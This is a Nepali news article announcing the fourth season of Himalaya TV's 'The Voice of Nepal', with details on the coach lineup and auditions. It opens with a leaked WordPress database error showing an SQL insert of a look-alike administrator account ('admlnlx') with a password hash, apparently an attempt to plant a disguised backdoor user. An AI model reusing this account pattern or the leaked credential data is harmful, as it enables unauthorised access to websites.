WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIWAAqlsJ63d3rIhi.f3vhJgFPHTFw.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:40:44', '', 'admlnlx', 'admlnlx')
काठमाडौं । द भ्वाइस अफ नेपाल हिमालय टेलिभिजनको गायन रियालिटी शो चौथो सिजनको औपचारिक घोषणा भएको छ । आगामी महिनादेखि प्रसारण तयारी रहेको चौथो सिजनको कोचमा हेरफेर भएको छ । दुई जना नयाँ कोचको प्रवेश भएको छ भने दुई जनाले निरन्तरता पाएका छन् ।
तीन सिजनसम्म कोच रहेका वरिष्ठ गायक दीप श्रेष्ठले यो सिजनमा विश्राम लिएका छन् । प्रमोद खरेल र राजु लामाले कोचकै रुपमा निरन्तरता पाएका छन् । राजेशपायल राई र प्रविशा अधिकारी नयाँ कोचको रुपमा चौथो सिजनमा जोडिएका छन् ।
डिजिटल अडिसनमा सहभागी भएका ४१ हजार आवेदकमध्येबाट छानिएका १२० प्रतिभा ब्लाइन्ड अडिसनको तयारीमा जुटेका छन् । यसपटक विदेशमा बसोबास गर्ने नेपालीभाषीले पनि सहभागिता जनाएका छन् । भारत, थाइल्यान्ड, बर्मा, अस्ट्रेलिया र अमेरिकामा बसोबास गरिरहेका नेपालीभाषी प्रतिभाले पनि अडिसनमा भाग लिएको जनाइएको छ ।
हिमालय टीभीका अध्यक्ष धर्मराज भुसालले एक महिनामै प्रसारण हुने गरी कार्यक्रम निर्माण अगाडि बढ्ने बताए । ब्लाइन्ड अडिसनमा प्रस्तुति दिनेमध्ये ६४ जना प्रतिभाले ब्याटल राउन्डमा प्रतिस्पर्धाको मौका पाउने निर्देशक लक्ष्मण पौडेलले बताए ।
चौथो सिजन हिमालय टीभीमा शुक्रबार र शनिबार राति ८ बजे प्रसारण हुनेछ ।